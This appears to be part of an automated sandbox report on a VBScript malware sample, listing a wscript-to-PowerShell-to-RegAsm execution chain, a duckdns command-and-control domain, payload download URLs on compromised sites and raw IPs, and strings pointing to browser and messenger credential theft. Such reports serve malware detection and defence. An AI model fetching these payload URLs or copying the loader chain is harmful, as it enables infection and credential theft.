                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044E879 FindFirstFileExA,4_2_0044E879
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_10006580 FindFirstFileExA,4_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: iwarsut775laudrye2.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: iwarsut775laudrye2.duckdns.org
                  Source: createdthingstobefrankwithmeeverywhere.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                  Source: createdthingstobefrankwithmeeverywhere.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                  Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
                  Source: global trafficHTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /59/LMTS.txt HTTP/1.1Host: 104.168.45.34Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 93.113.54.56 93.113.54.56
                  Source: Joe Sandbox ViewIP Address: 192.253.251.227 192.253.251.227
                  Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
                  Source: Joe Sandbox ViewASN Name: THORDC-ASIS THORDC-ASIS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_0041B380
                  Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
                  Source: global trafficHTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /59/LMTS.txt HTTP/1.1Host: 104.168.45.34Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: global trafficDNS traffic detected: DNS query: asociatiatraditiimaria.ro
                  Source: global trafficDNS traffic detected: DNS query: new.quranushaiqer.org.sa
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Sat, 27 Jul 2024 11:31:16 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Sat, 27 Jul 2024 11:31:23 GMTserver: LiteSpeed
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34/59/LMTS.txt
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
                  Source: powershell.exe, 00000002.00000002.2167362177.000001B1E9A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpegM
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                  Source: wscript.exe, 00000005.00000003.2140898625.0000000003281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2125566333.0000000003306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141365751.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2124716308.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2126019365.000000000332D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2143150221.00000000032A7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: wscript.exe, 00000005.00000003.2140898625.0000000003281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141365751.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2143150221.00000000032A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enclE8
                  Source: RegAsm.exe, 00000004.00000002.3267737078.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, bhvCCC4.tmp.7.drString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0H
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.msocsp.com0S
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                  Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                  Source: RegAsm.exe, 00000007.00000002.2129094375.00000000010F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/comments/feed/
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/feed/
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/os/transportment.pfm
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
                  Source: powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-json/
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                  Source: powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
